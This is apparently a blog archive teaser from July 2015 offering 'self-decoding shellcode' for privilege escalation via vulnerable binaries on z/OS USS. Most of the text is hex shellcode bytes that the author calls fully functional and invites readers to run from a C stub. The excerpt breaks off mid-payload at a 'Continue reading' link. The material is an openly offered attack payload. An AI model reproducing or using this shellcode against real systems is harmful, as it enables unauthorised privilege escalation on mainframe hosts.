Month: July 2015

Got a burning privesc vulnerable binary on your  USS? How about feeding it a little self-decoding shellcode?  (Hint this is fully functional, find a C stub and try it yourself!). “\x90\xec\xd0\x0c\xc0\xf0\xff\xff\xff\xfe\x18\xcf\x17\x11\x17\x22” “\x17\x33\xc2\x19\x01\x01\x01\x02\xc2\x29\x01\x01\x01\x03\x17\x12” “\x18\x41\x8b\x40\x10\x01\x17\xaa\x17\x22\xc0\xa1\xde\xad\xbe\xef” “\x18\xbc\x1a\xb1\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xfc\x1a\xb4” “\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xf6\x17\x22\x17\x33\x1a\xb1” “\x1b\xb4\x50\xd0\xb0\x04\x50\xb0\xd0\x08\x18\xdb\x18\x3b\x1a\x34” “\x1a\x34\x1a\x34\x1a\x34\x18\x53\x1b\x31\x18\x41\x17\x11\x17\x22” “\x97\x02\x30\x01\x1a\x14\xb9\xf8\x10\x23\x97\x02\x20\x01\xa7\x1e” “\x01\x70\xa7\x44\xff\xf9\x17\x44\x58\xd4\xb0\x04\x0d\xe5\xde\xad” “\xbe\xef\xde\xad\xbe\xef\xde\xad\xbe\xef\xde\xad\xbe\xef\x92\xe9” “\xd2\x0e\xc2\xf2\xfd\xfd\xfd\xfc\x5a\x02\xf2\x2a\x5a\xf2\xf2\x2e” “\x5a\xe2\x02\x12\x5a\xec\x01\x06\x5a\xec\x02\xa2\xb0\x1a\xe2\x02” “\xa5\xf6\x02\x05\x02\x02\x02\x12\x02\xda\x02\x02\x02\x04\x1a\xff” “\x1a\xd3\x52\xf2\xd2\x06\x52\xd2\xf2\x0a\x5a\x12\xf2\x1a\x43\xa2” “\x02\xda\x1c\xaf\x52\xa2\xd2\x4a\xc2\x32\x02\x02\x02\x75\xe9\xe9” “\xd2\x96\x02\x24\xc2\xb2\x02\x02\x02\x77\x43\x22\x02\x02\x52\x22” “\xd2\x82\x43\xe2\x02\x05\x52\xe2\xd2\x86\x43\xe2\xd2\x82\x52\xe2” “\xd2\x8a\x1a\xe0\x52\xe2\xd2\x92\xd0\x01\xd2\x92\xe2\x12\x5a\xe2” “\xd2\x92\xd0\x01\xd2\x92\xe0\x22\x5a\xe2\xd2\x92\xd0\x01\xd2\x92” “\xe2\x1a\x5a\xe2\xd2\x92\xd0\x01\xd2\x92\xe2\xe6\x5a\xe2\xd2\x8a” “\x1d\x02\x41\x02\xe2\x02\x5a\xf2\xd2\x92\x43\xe2\xd2\x82\x43\x42” “\xd2\x86\x43\x12\xd2\x4e\x52\x42\xd2\x4e\x1a\x49\x52\x42\xd2\x52” “\x52\xe2\xd2\x56\x52\x02\xd2\x5a\x52\x02\xd2\x5e\x52\xe2\xd2\x62” “\x52\x02\xd2\x66\x52\x02\xd2\x6a\x52\xe2\xd2\x6e\x52\x02\xd2\x72” “\x52\xe2\xd2\x76\x52\xe2\xd2\x7a\x52\xe2\xd2\x7e\xd0\x01\xd2\x0a”… Continue reading Shellcode Freebie!